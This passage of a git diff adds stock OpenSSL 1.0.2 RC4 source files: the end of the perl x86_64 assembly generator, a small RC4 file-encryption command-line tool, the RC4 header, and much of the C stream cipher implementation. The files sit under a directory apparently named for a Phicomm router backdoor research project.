+push(@TX,shift(@TX)); push(@XX,shift(@XX));	# "rotate" registers
+}
+for ($i=4;$i<8;$i++) {
+$code.=<<___;
+	add	$TX[0]#b,$YY#b
+	lea	1($XX[0]),$XX[1]
+	movzb	($dat,$YY),$TY#d
+	movzb	$XX[1]#b,$XX[1]#d
+	movzb	($dat,$XX[1]),$TX[1]#d
+	movb	$TX[0]#b,($dat,$YY)
+	cmp	$XX[1],$YY
+	movb	$TY#b,($dat,$XX[0])
+	jne	.Lcmov$i			# Intel cmov is sloooow...
+	mov	$TX[0],$TX[1]
+.Lcmov$i:
+	add	$TX[0]#b,$TY#b
+	xor	($dat,$TY),%r9b
+	ror	\$8,%r9d
+___
+push(@TX,shift(@TX)); push(@XX,shift(@XX));	# "rotate" registers
+}
+$code.=<<___;
+	lea	-8($len),$len
+	mov	%r8d,($out)
+	lea	8($inp),$inp
+	mov	%r9d,4($out)
+	lea	8($out),$out
+
+	test	\$-8,$len
+	jnz	.Lcloop8
+	cmp	\$0,$len
+	jne	.Lcloop1
+	jmp	.Lexit
+___
+$code.=<<___;
+.align	16
+.Lcloop1:
+	add	$TX[0]#b,$YY#b
+	movzb	$YY#b,$YY#d
+	movzb	($dat,$YY),$TY#d
+	movb	$TX[0]#b,($dat,$YY)
+	movb	$TY#b,($dat,$XX[0])
+	add	$TX[0]#b,$TY#b
+	add	\$1,$XX[0]#b
+	movzb	$TY#b,$TY#d
+	movzb	$XX[0]#b,$XX[0]#d
+	movzb	($dat,$TY),$TY#d
+	movzb	($dat,$XX[0]),$TX[0]#d
+	xorb	($inp),$TY#b
+	lea	1($inp),$inp
+	movb	$TY#b,($out)
+	lea	1($out),$out
+	sub	\$1,$len
+	jnz	.Lcloop1
+	jmp	.Lexit
+
+.align	16
+.Lexit:
+	sub	\$1,$XX[0]#b
+	movl	$XX[0]#d,-8($dat)
+	movl	$YY#d,-4($dat)
+
+	mov	(%rsp),%r13
+	mov	8(%rsp),%r12
+	mov	16(%rsp),%rbx
+	add	\$24,%rsp
+.Lepilogue:
+	ret
+.size	RC4,.-RC4
+___
+}
+
+$idx="%r8";
+$ido="%r9";
+
+$code.=<<___;
+.globl	private_RC4_set_key
+.type	private_RC4_set_key,\@function,3
+.align	16
+private_RC4_set_key:
+	lea	8($dat),$dat
+	lea	($inp,$len),$inp
+	neg	$len
+	mov	$len,%rcx
+	xor	%eax,%eax
+	xor	$ido,$ido
+	xor	%r10,%r10
+	xor	%r11,%r11
+
+	mov	OPENSSL_ia32cap_P(%rip),$idx#d
+	bt	\$20,$idx#d	# RC4_CHAR?
+	jc	.Lc1stloop
+	jmp	.Lw1stloop
+
+.align	16
+.Lw1stloop:
+	mov	%eax,($dat,%rax,4)
+	add	\$1,%al
+	jnc	.Lw1stloop
+
+	xor	$ido,$ido
+	xor	$idx,$idx
+.align	16
+.Lw2ndloop:
+	mov	($dat,$ido,4),%r10d
+	add	($inp,$len,1),$idx#b
+	add	%r10b,$idx#b
+	add	\$1,$len
+	mov	($dat,$idx,4),%r11d
+	cmovz	%rcx,$len
+	mov	%r10d,($dat,$idx,4)
+	mov	%r11d,($dat,$ido,4)
+	add	\$1,$ido#b
+	jnc	.Lw2ndloop
+	jmp	.Lexit_key
+
+.align	16
+.Lc1stloop:
+	mov	%al,($dat,%rax)
+	add	\$1,%al
+	jnc	.Lc1stloop
+
+	xor	$ido,$ido
+	xor	$idx,$idx
+.align	16
+.Lc2ndloop:
+	mov	($dat,$ido),%r10b
+	add	($inp,$len),$idx#b
+	add	%r10b,$idx#b
+	add	\$1,$len
+	mov	($dat,$idx),%r11b
+	jnz	.Lcnowrap
+	mov	%rcx,$len
+.Lcnowrap:
+	mov	%r10b,($dat,$idx)
+	mov	%r11b,($dat,$ido)
+	add	\$1,$ido#b
+	jnc	.Lc2ndloop
+	movl	\$-1,256($dat)
+
+.align	16
+.Lexit_key:
+	xor	%eax,%eax
+	mov	%eax,-8($dat)
+	mov	%eax,-4($dat)
+	ret
+.size	private_RC4_set_key,.-private_RC4_set_key
+
+.globl	RC4_options
+.type	RC4_options,\@abi-omnipotent
+.align	16
+RC4_options:
+	lea	.Lopts(%rip),%rax
+	mov	OPENSSL_ia32cap_P(%rip),%edx
+	bt	\$20,%edx
+	jc	.L8xchar
+	bt	\$30,%edx
+	jnc	.Ldone
+	add	\$25,%rax
+	ret
+.L8xchar:
+	add	\$12,%rax
+.Ldone:
+	ret
+.align	64
+.Lopts:
+.asciz	"rc4(8x,int)"
+.asciz	"rc4(8x,char)"
+.asciz	"rc4(16x,int)"
+.asciz	"RC4 for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
+.align	64
+.size	RC4_options,.-RC4_options
+___
+
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	stream_se_handler,\@abi-omnipotent
+.align	16
+stream_se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	lea	.Lprologue(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	lea	.Lepilogue(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lin_prologue
+
+	lea	24(%rax),%rax
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%r12
+	mov	-24(%rax),%r13
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+
+.Lin_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	jmp	.Lcommon_seh_exit
+.size	stream_se_handler,.-stream_se_handler
+
+.type	key_se_handler,\@abi-omnipotent
+.align	16
+key_se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	152($context),%rax	# pull context->Rsp
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+.Lcommon_seh_exit:
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	key_se_handler,.-key_se_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_RC4
+	.rva	.LSEH_end_RC4
+	.rva	.LSEH_info_RC4
+
+	.rva	.LSEH_begin_private_RC4_set_key
+	.rva	.LSEH_end_private_RC4_set_key
+	.rva	.LSEH_info_private_RC4_set_key
+
+.section	.xdata
+.align	8
+.LSEH_info_RC4:
+	.byte	9,0,0,0
+	.rva	stream_se_handler
+.LSEH_info_private_RC4_set_key:
+	.byte	9,0,0,0
+	.rva	key_se_handler
+___
+}
+
+sub reg_part {
+my ($reg,$conv)=@_;
+    if ($reg =~ /%r[0-9]+/)	{ $reg .= $conv; }
+    elsif ($conv eq "b")	{ $reg =~ s/%[er]([^x]+)x?/%$1l/;	}
+    elsif ($conv eq "w")	{ $reg =~ s/%[er](.+)/%$1/;		}
+    elsif ($conv eq "d")	{ $reg =~ s/%[er](.+)/%e$1/;		}
+    return $reg;
+}
+
+$code =~ s/(%[a-z0-9]+)#([bwd])/reg_part($1,$2)/gem;
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+
+print $code;
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4.c
new file mode 100644
index 0000000..99082e8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4.c
@@ -0,0 +1,179 @@
+/* crypto/rc4/rc4.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <openssl/rc4.h>
+#include <openssl/evp.h>
+
+char *usage[] = {
+    "usage: rc4 args\n",
+    "\n",
+    " -in arg         - input file - default stdin\n",
+    " -out arg        - output file - default stdout\n",
+    " -key key        - password\n",
+    NULL
+};
+
+int main(int argc, char *argv[])
+{
+    FILE *in = NULL, *out = NULL;
+    char *infile = NULL, *outfile = NULL, *keystr = NULL;
+    RC4_KEY key;
+    char buf[BUFSIZ];
+    int badops = 0, i;
+    char **pp;
+    unsigned char md[MD5_DIGEST_LENGTH];
+
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-key") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keystr = *(++argv);
+        } else {
+            fprintf(stderr, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+ bad:
+        for (pp = usage; (*pp != NULL); pp++)
+            fprintf(stderr, "%s", *pp);
+        exit(1);
+    }
+
+    if (infile == NULL)
+        in = stdin;
+    else {
+        in = fopen(infile, "r");
+        if (in == NULL) {
+            perror("open");
+            exit(1);
+        }
+
+    }
+    if (outfile == NULL)
+        out = stdout;
+    else {
+        out = fopen(outfile, "w");
+        if (out == NULL) {
+            perror("open");
+            exit(1);
+        }
+    }
+
+#ifdef OPENSSL_SYS_MSDOS
+    /* This should set the file to binary mode. */
+    {
+# include <fcntl.h>
+        setmode(fileno(in), O_BINARY);
+        setmode(fileno(out), O_BINARY);
+    }
+#endif
+
+    if (keystr == NULL) {       /* get key */
+        i = EVP_read_pw_string(buf, BUFSIZ, "Enter RC4 password:", 0);
+        if (i != 0) {
+            OPENSSL_cleanse(buf, BUFSIZ);
+            fprintf(stderr, "bad password read\n");
+            exit(1);
+        }
+        keystr = buf;
+    }
+
+    EVP_Digest((unsigned char *)keystr, strlen(keystr), md, NULL, EVP_md5(),
+               NULL);
+    OPENSSL_cleanse(keystr, strlen(keystr));
+    RC4_set_key(&key, MD5_DIGEST_LENGTH, md);
+
+    for (;;) {
+        i = fread(buf, 1, BUFSIZ, in);
+        if (i == 0)
+            break;
+        if (i < 0) {
+            perror("read");
+            exit(1);
+        }
+        RC4(&key, (unsigned int)i, (unsigned char *)buf,
+            (unsigned char *)buf);
+        i = fwrite(buf, (unsigned int)i, 1, out);
+        if (i != 1) {
+            perror("write");
+            exit(1);
+        }
+    }
+    fclose(out);
+    fclose(in);
+    exit(0);
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4.h
new file mode 100644
index 0000000..39162b1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4.h
@@ -0,0 +1,88 @@
+/* crypto/rc4/rc4.h */
+/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_RC4_H
+# define HEADER_RC4_H
+
+# include <openssl/opensslconf.h>/* OPENSSL_NO_RC4, RC4_INT */
+# ifdef OPENSSL_NO_RC4
+#  error RC4 is disabled.
+# endif
+
+# include <stddef.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+typedef struct rc4_key_st {
+    RC4_INT x, y;
+    RC4_INT data[256];
+} RC4_KEY;
+
+const char *RC4_options(void);
+void RC4_set_key(RC4_KEY *key, int len, const unsigned char *data);
+void private_RC4_set_key(RC4_KEY *key, int len, const unsigned char *data);
+void RC4(RC4_KEY *key, size_t len, const unsigned char *indata,
+         unsigned char *outdata);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_enc.c
new file mode 100644
index 0000000..0f0a248
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rc4_enc.c
@@ -0,0 +1,334 @@
+/* crypto/rc4/rc4_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/rc4.h>
+#include "rc4_locl.h"
+
+/*-
+ * RC4 as implemented from a posting from
+ * Newsgroups: sci.crypt
+ * From: sterndark@netcom.com (David Sterndark)
+ * Subject: RC4 Algorithm revealed.
+ * Message-ID: <sternCvKL4B.Hyy@netcom.com>
+ * Date: Wed, 14 Sep 1994 06:35:31 GMT
+ */
+
+void RC4(RC4_KEY *key, size_t len, const unsigned char *indata,
+         unsigned char *outdata)
+{
+    register RC4_INT *d;
+    register RC4_INT x, y, tx, ty;
+    size_t i;
+
+    x = key->x;
+    y = key->y;
+    d = key->data;
+
+#if defined(RC4_CHUNK) && !defined(PEDANTIC)
+    /*-
+     * The original reason for implementing this(*) was the fact that
+     * pre-21164a Alpha CPUs don't have byte load/store instructions
+     * and e.g. a byte store has to be done with 64-bit load, shift,
+     * and, or and finally 64-bit store. Peaking data and operating
+     * at natural word size made it possible to reduce amount of
+     * instructions as well as to perform early read-ahead without
+     * suffering from RAW (read-after-write) hazard. This resulted
+     * in ~40%(**) performance improvement on 21064 box with gcc.
+     * But it's not only Alpha users who win here:-) Thanks to the
+     * early-n-wide read-ahead this implementation also exhibits
+     * >40% speed-up on SPARC and 20-30% on 64-bit MIPS (depending
+     * on sizeof(RC4_INT)).
+     *
+     * (*)  "this" means code which recognizes the case when input
+     *      and output pointers appear to be aligned at natural CPU
+     *      word boundary
+     * (**) i.e. according to 'apps/openssl speed rc4' benchmark,
+     *      crypto/rc4/rc4speed.c exhibits almost 70% speed-up...
+     *
+     * Cavets.
+     *
+     * - RC4_CHUNK="unsigned long long" should be a #1 choice for
+     *   UltraSPARC. Unfortunately gcc generates very slow code
+     *   (2.5-3 times slower than one generated by Sun's WorkShop
+     *   C) and therefore gcc (at least 2.95 and earlier) should
+     *   always be told that RC4_CHUNK="unsigned long".
+     *
+     *                                      <appro@fy.chalmers.se>
+     */
+
+# define RC4_STEP       ( \
+                        x=(x+1) &0xff,  \
+                        tx=d[x],        \
+                        y=(tx+y)&0xff,  \
+                        ty=d[y],        \
+                        d[y]=tx,        \
+                        d[x]=ty,        \
+                        (RC4_CHUNK)d[(tx+ty)&0xff]\
+                        )
+
+    if ((((size_t)indata & (sizeof(RC4_CHUNK) - 1)) |
+         ((size_t)outdata & (sizeof(RC4_CHUNK) - 1))) == 0) {
+        RC4_CHUNK ichunk, otp;
+        const union {
+            long one;
+            char little;
+        } is_endian = {
+            1
+        };
+
+        /*-
+         * I reckon we can afford to implement both endian
+         * cases and to decide which way to take at run-time
+         * because the machine code appears to be very compact
+         * and redundant 1-2KB is perfectly tolerable (i.e.
+         * in case the compiler fails to eliminate it:-). By
+         * suggestion from Terrel Larson <terr@terralogic.net>
+         * who also stands for the is_endian union:-)
+         *
+         * Special notes.
+         *
+         * - is_endian is declared automatic as doing otherwise
+         *   (declaring static) prevents gcc from eliminating
+         *   the redundant code;
+         * - compilers (those I've tried) don't seem to have
+         *   problems eliminating either the operators guarded
+         *   by "if (sizeof(RC4_CHUNK)==8)" or the condition
+         *   expressions themselves so I've got 'em to replace
+         *   corresponding #ifdefs from the previous version;
+         * - I chose to let the redundant switch cases when
+         *   sizeof(RC4_CHUNK)!=8 be (were also #ifdefed
+         *   before);
+         * - in case you wonder "&(sizeof(RC4_CHUNK)*8-1)" in
+         *   [LB]ESHFT guards against "shift is out of range"
+         *   warnings when sizeof(RC4_CHUNK)!=8
+         *
+         *                      <appro@fy.chalmers.se>
+         */
+        if (!is_endian.little) { /* BIG-ENDIAN CASE */
+# define BESHFT(c)      (((sizeof(RC4_CHUNK)-(c)-1)*8)&(sizeof(RC4_CHUNK)*8-1))
+            for (; len & (0 - sizeof(RC4_CHUNK)); len -= sizeof(RC4_CHUNK)) {
+                ichunk = *(RC4_CHUNK *) indata;
+                otp = RC4_STEP << BESHFT(0);
+                otp |= RC4_STEP << BESHFT(1);
+                otp |= RC4_STEP << BESHFT(2);
+                otp |= RC4_STEP << BESHFT(3);
+                if (sizeof(RC4_CHUNK) == 8) {
+                    otp |= RC4_STEP << BESHFT(4);
+                    otp |= RC4_STEP << BESHFT(5);
+                    otp |= RC4_STEP << BESHFT(6);
+                    otp |= RC4_STEP << BESHFT(7);
+                }
+                *(RC4_CHUNK *) outdata = otp ^ ichunk;
+                indata += sizeof(RC4_CHUNK);
+                outdata += sizeof(RC4_CHUNK);
+            }
+            if (len) {
+                RC4_CHUNK mask = (RC4_CHUNK) - 1, ochunk;
+
+                ichunk = *(RC4_CHUNK *) indata;
+                ochunk = *(RC4_CHUNK *) outdata;
+                otp = 0;
+                i = BESHFT(0);
+                mask <<= (sizeof(RC4_CHUNK) - len) << 3;
+                switch (len & (sizeof(RC4_CHUNK) - 1)) {
+                case 7:
+                    otp = RC4_STEP << i, i -= 8;
+                case 6:
+                    otp |= RC4_STEP << i, i -= 8;
+                case 5:
+                    otp |= RC4_STEP << i, i -= 8;
+                case 4:
+                    otp |= RC4_STEP << i, i -= 8;
+                case 3:
+                    otp |= RC4_STEP << i, i -= 8;
+                case 2:
+                    otp |= RC4_STEP << i, i -= 8;
+                case 1:
+                    otp |= RC4_STEP << i, i -= 8;
+                case 0:;       /*
+                                 * it's never the case,
+                                 * but it has to be here
+                                 * for ultrix?
+                                 */
+                }
+                ochunk &= ~mask;
+                ochunk |= (otp ^ ichunk) & mask;
+                *(RC4_CHUNK *) outdata = ochunk;
+            }
+            key->x = x;
+            key->y = y;
+            return;
+        } else {                /* LITTLE-ENDIAN CASE */
+# define LESHFT(c)      (((c)*8)&(sizeof(RC4_CHUNK)*8-1))
+            for (; len & (0 - sizeof(RC4_CHUNK)); len -= sizeof(RC4_CHUNK)) {
+                ichunk = *(RC4_CHUNK *) indata;
+                otp = RC4_STEP;
+                otp |= RC4_STEP << 8;
+                otp |= RC4_STEP << 16;
+                otp |= RC4_STEP << 24;
+                if (sizeof(RC4_CHUNK) == 8) {
+                    otp |= RC4_STEP << LESHFT(4);
+                    otp |= RC4_STEP << LESHFT(5);
+                    otp |= RC4_STEP << LESHFT(6);
+                    otp |= RC4_STEP << LESHFT(7);
+                }
+                *(RC4_CHUNK *) outdata = otp ^ ichunk;
+                indata += sizeof(RC4_CHUNK);
+                outdata += sizeof(RC4_CHUNK);
+            }
+            if (len) {
+                RC4_CHUNK mask = (RC4_CHUNK) - 1, ochunk;
+
+                ichunk = *(RC4_CHUNK *) indata;
+                ochunk = *(RC4_CHUNK *) outdata;
+                otp = 0;
+                i = 0;
+                mask >>= (sizeof(RC4_CHUNK) - len) << 3;
+                switch (len & (sizeof(RC4_CHUNK) - 1)) {
+                case 7:
+                    otp = RC4_STEP, i += 8;
+                case 6:
+                    otp |= RC4_STEP << i, i += 8;
+                case 5:
+                    otp |= RC4_STEP << i, i += 8;
+                case 4:
+                    otp |= RC4_STEP << i, i += 8;
+                case 3:
+                    otp |= RC4_STEP << i, i += 8;
+                case 2:
+                    otp |= RC4_STEP << i, i += 8;
+                case 1:
+                    otp |= RC4_STEP << i, i += 8;
+                case 0:;       /*
+                                 * it's never the case,
+                                 * but it has to be here
+                                 * for ultrix?
+                                 */
+                }
+                ochunk &= ~mask;
+                ochunk |= (otp ^ ichunk) & mask;
+                *(RC4_CHUNK *) outdata = ochunk;
+            }
